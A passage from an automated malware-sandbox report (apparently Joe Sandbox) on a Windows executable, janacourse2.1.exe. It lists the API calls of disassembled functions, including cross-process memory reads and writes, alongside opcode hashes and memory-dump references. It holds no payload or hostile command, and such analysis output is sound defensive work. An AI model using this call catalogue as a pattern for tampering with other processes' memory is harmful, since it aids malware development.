                                                                                                            • Opcode Fuzzy Hash: afca01d70249ca72f991e66c4cf54544a69984cbe60a5311f55888fd93b232f7
                                                                                                            • Instruction Fuzzy Hash: 01018775C0262DDBDF51ABE4DA88AEDBB79BF09700F000546E982B2248CB3995408BA1
                                                                                                            APIs
                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011114
                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011120
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 0101112F
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011136
                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101114D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 842720411-0
                                                                                                            • Opcode ID: 57aa965f784cfa577d9ef4f5ffb07deab41dbcf2bf4a240ba16c8c789941a1bd
                                                                                                            • Instruction ID: 333897b95f0d887bcb6831679c31ccce2f351feb8608202d7c9c8918e86551a9
                                                                                                            • Opcode Fuzzy Hash: 57aa965f784cfa577d9ef4f5ffb07deab41dbcf2bf4a240ba16c8c789941a1bd
                                                                                                            • Instruction Fuzzy Hash: 000181B9101205BFEB654FA9DE89E6A3FAEFF86264B100454FA81C3354DB36DC008B60
                                                                                                            APIs
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01010FCA
                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01010FD6
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01010FE5
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01010FEC
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01011002
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 44706859-0
                                                                                                            • Opcode ID: 07ad69463d69f417952cde7d7b35cf253099c3f2e1d46745bafd59d6122e0f87
                                                                                                            • Instruction ID: 27bfed43911b5bd3f74573274e421429d554c878795f51d80de5bc58fb20fdfb
                                                                                                            • Opcode Fuzzy Hash: 07ad69463d69f417952cde7d7b35cf253099c3f2e1d46745bafd59d6122e0f87
                                                                                                            • Instruction Fuzzy Hash: 8CF0C279202301ABE7220FA8DE8DF563FADEF8A762F100414FA85C7244CA79D8408B60
                                                                                                            APIs
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0101102A
                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01011036
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011045
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0101104C
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011062
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 44706859-0
                                                                                                            • Opcode ID: 8d5d579ffc416dbfde319c9c88d1fd74278e1046b01a451d644cdd6fdbacfd96
                                                                                                            • Instruction ID: 0599b31e41b9c09aaa38d150de413419c0f66d92b56fa6db8695b1f576a21d5a
                                                                                                            • Opcode Fuzzy Hash: 8d5d579ffc416dbfde319c9c88d1fd74278e1046b01a451d644cdd6fdbacfd96
                                                                                                            • Instruction Fuzzy Hash: D2F0C279202301ABE7221FA9EE88F563FADEF8A661F100414FA85C7244CA79D850CB60
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 01020324
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 01020331
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 0102033E
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 0102034B
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 01020358
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 01020365
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 64f8dee81ae23c19a6d5160a6bcc37c6f70c054d3f6b045d0a016da3db98f83c
                                                                                                            • Instruction ID: 40a4cc1a6049d10d24ad5951ffec8dfcff62583fcbbd422ba3f66ce0ea8ce3e3
                                                                                                            • Opcode Fuzzy Hash: 64f8dee81ae23c19a6d5160a6bcc37c6f70c054d3f6b045d0a016da3db98f83c
                                                                                                            • Instruction Fuzzy Hash: AF019072801B259FD7309F6AD880413FBF9BE502153158A7EE29652931C371A954CF80
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00FED752
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FED764
                                                                                                            • _free.LIBCMT ref: 00FED776
                                                                                                            • _free.LIBCMT ref: 00FED788
                                                                                                            • _free.LIBCMT ref: 00FED79A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: d5e29d051c6813dccb64224551096c2fba74a0f458b32da4f0ad00f5017d8151
                                                                                                            • Instruction ID: f0d8279ca24b0af2952dea27763cb8e26bf14f6d34095ef47fed61ee0a63367c
                                                                                                            • Opcode Fuzzy Hash: d5e29d051c6813dccb64224551096c2fba74a0f458b32da4f0ad00f5017d8151
                                                                                                            • Instruction Fuzzy Hash: 45F06832D002896B86A5EB5AF9C6C1A77EDBB04330B951809F084E7906D73DFC406761
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 01015C58
                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 01015C6F
                                                                                                            • MessageBeep.USER32(00000000), ref: 01015C87
                                                                                                            • KillTimer.USER32(?,0000040A), ref: 01015CA3
                                                                                                            • EndDialog.USER32(?,00000001), ref: 01015CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3741023627-0
                                                                                                            • Opcode ID: c45e835be2edc8084b2d932e572713b4db6ebbf9efc7ebe4e2b605fa34fd2c90
                                                                                                            • Instruction ID: 732f77264bd3464e83097232c9096bfdde9213b8dd0a7adbe890caf41f5d3e4e
                                                                                                            • Opcode Fuzzy Hash: c45e835be2edc8084b2d932e572713b4db6ebbf9efc7ebe4e2b605fa34fd2c90
                                                                                                            • Instruction Fuzzy Hash: 4901A274501708AFFB305F10DF8EFA67BB8BB45B05F040299A6C2A50D5DBF9A9848B90
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00FE22BE
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FE22D0
                                                                                                            • _free.LIBCMT ref: 00FE22E3
                                                                                                            • _free.LIBCMT ref: 00FE22F4
                                                                                                            • _free.LIBCMT ref: 00FE2305
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: fbc1f1e344200b0094c6a67e3d0c3aaeb9fe4dabcca6a32c65794dedcaaea052
                                                                                                            • Instruction ID: a558ab96f0b13fbb97a2cbadfe401c3a66f5fd483dfc59f3eee53406c8b51020
                                                                                                            • Opcode Fuzzy Hash: fbc1f1e344200b0094c6a67e3d0c3aaeb9fe4dabcca6a32c65794dedcaaea052
                                                                                                            • Instruction Fuzzy Hash: D5F030B18041558B97B2AF59F80280C3B78BB187707015506F4D0D626FD73E1412BBA6
                                                                                                            APIs
                                                                                                            • EndPath.GDI32(?), ref: 00FC95D4
                                                                                                            • StrokeAndFillPath.GDI32(?,?,010071F7,00000000,?,?,?), ref: 00FC95F0
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00FC9603
                                                                                                            • DeleteObject.GDI32 ref: 00FC9616
                                                                                                            • StrokePath.GDI32(?), ref: 00FC9631
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2625713937-0
                                                                                                            • Opcode ID: dc17992c7443122473d604b016ef1bbaba73f3ce86d360cba076d7db1bd2a205
                                                                                                            • Instruction ID: be57289b4585dc9a5aa08c7a0f0d184672a38b70cf70c542f58deb5c21d6d752
                                                                                                            • Opcode Fuzzy Hash: dc17992c7443122473d604b016ef1bbaba73f3ce86d360cba076d7db1bd2a205
                                                                                                            • Instruction Fuzzy Hash: ACF03C3540E605AFEB365F65EB4DB683B61AB11332F048218F4E5550F8CB7A8992EF20
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __freea$_free
                                                                                                            • String ID: a/p$am/pm
                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                            • Opcode ID: 3d75d5e5e11928e224e1d053e2116617f478c4f0840e90207e41e9a87e89bd1a
                                                                                                            • Instruction ID: c84eeb388d7708f3e9ef833935927d09957751602a5b1e542a24c37c398d0b66
                                                                                                            • Opcode Fuzzy Hash: 3d75d5e5e11928e224e1d053e2116617f478c4f0840e90207e41e9a87e89bd1a
                                                                                                            • Instruction Fuzzy Hash: 3FD10572D00286CEDB249F6BC845BFEB7B5FF05320F28015AEA019B654D7799D80EB91
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FD0242: EnterCriticalSection.KERNEL32(0108070C,01081884,?,?,00FC198B,01082518,?,?,?,00FB12F9,00000000), ref: 00FD024D
                                                                                                              • Part of subcall function 00FD0242: LeaveCriticalSection.KERNEL32(0108070C,?,00FC198B,01082518,?,?,?,00FB12F9,00000000), ref: 00FD028A
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 00FD00A3: __onexit.LIBCMT ref: 00FD00A9
                                                                                                            • __Init_thread_footer.LIBCMT ref: 01037BFB
                                                                                                              • Part of subcall function 00FD01F8: EnterCriticalSection.KERNEL32(0108070C,?,?,00FC8747,01082514), ref: 00FD0202
                                                                                                              • Part of subcall function 00FD01F8: LeaveCriticalSection.KERNEL32(0108070C,?,00FC8747,01082514), ref: 00FD0235
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                            • API String ID: 535116098-3733170431
                                                                                                            • Opcode ID: 3b996b15ff2aabdb9002f418e8fa6f6de96c3ebd0e65433d4a17a676c4c622e2
                                                                                                            • Instruction ID: 3a37d04a0058e8654379e2a6c8133dd272efdd2757421b0a5ec0089a7569f5f5
                                                                                                            • Opcode Fuzzy Hash: 3b996b15ff2aabdb9002f418e8fa6f6de96c3ebd0e65433d4a17a676c4c622e2
                                                                                                            • Instruction Fuzzy Hash: 8B918FB1A00209EFCB05EF59D894DADB7B9FF89300F14809DF9865B252DB71AE41CB51
                                                                                                            APIs
                                                                                                              • Part of subcall function 0101B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010121D0,?,?,00000034,00000800,?,00000034), ref: 0101B42D
                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01012760
                                                                                                              • Part of subcall function 0101B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0101B3F8
                                                                                                              • Part of subcall function 0101B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0101B355
                                                                                                              • Part of subcall function 0101B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01012194,00000034,?,?,00001004,00000000,00000000), ref: 0101B365
                                                                                                              • Part of subcall function 0101B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01012194,00000034,?,?,00001004,00000000,00000000), ref: 0101B37B
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010127CD
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0101281A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                            • Opcode ID: 5cde73fc3d4a3de9f1c99f97438ae22a11d4d8e49ad0fd1f6a6dcb88e4b97657
                                                                                                            • Instruction ID: f5648bea0781aeeed60c642b3a35b16865f0275fac73a8c3f7e0eb61bf008d6d
                                                                                                            • Opcode Fuzzy Hash: 5cde73fc3d4a3de9f1c99f97438ae22a11d4d8e49ad0fd1f6a6dcb88e4b97657
                                                                                                            • Instruction Fuzzy Hash: C3416D76901218BFDB10DFA4CD81AEEBBB8EF19300F108095FA95B7184DB746E45CBA0
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\janacourse2.1.exe,00000104), ref: 00FE1769
                                                                                                            • _free.LIBCMT ref: 00FE1834
                                                                                                            • _free.LIBCMT ref: 00FE183E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Users\user\Desktop\janacourse2.1.exe
                                                                                                            • API String ID: 2506810119-596226746
                                                                                                            • Opcode ID: 8151b9ae01661c8fdf1b11ee61e0ebcc1dfb628abcd007fbf6a5c519a4671bc0
                                                                                                            • Instruction ID: 4acbcabbab70fbd1ffa08fe17ec52006fa3107d644b95c9b8de53c1d90ed9702
                                                                                                            • Opcode Fuzzy Hash: 8151b9ae01661c8fdf1b11ee61e0ebcc1dfb628abcd007fbf6a5c519a4671bc0
                                                                                                            • Instruction Fuzzy Hash: 01318F71E04298AFDB21DF9B9C81D9EBBBCFF85720B144166F84497201D6748E41EB90
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0101C306
                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 0101C34C
                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01081990,01185A40), ref: 0101C395
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 135850232-4108050209
                                                                                                            • Opcode ID: a61c69256397a6119006a8c39c751b137182ee7544639a4cac86ade8ee5a6bfb
                                                                                                            • Instruction ID: 052782f96603d52affeb3d27c2bf2775e737b76a5cb952b904eb725e1441cf49
                                                                                                            • Opcode Fuzzy Hash: a61c69256397a6119006a8c39c751b137182ee7544639a4cac86ade8ee5a6bfb
                                                                                                            • Instruction Fuzzy Hash: F141E3712443029FE724DF29D984B5ABBE8AF85310F04865EF9E5972C5D738E604CB52
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0104CC08,00000000,?,?,?,?), ref: 010444AA
                                                                                                            • GetWindowLongW.USER32 ref: 010444C7
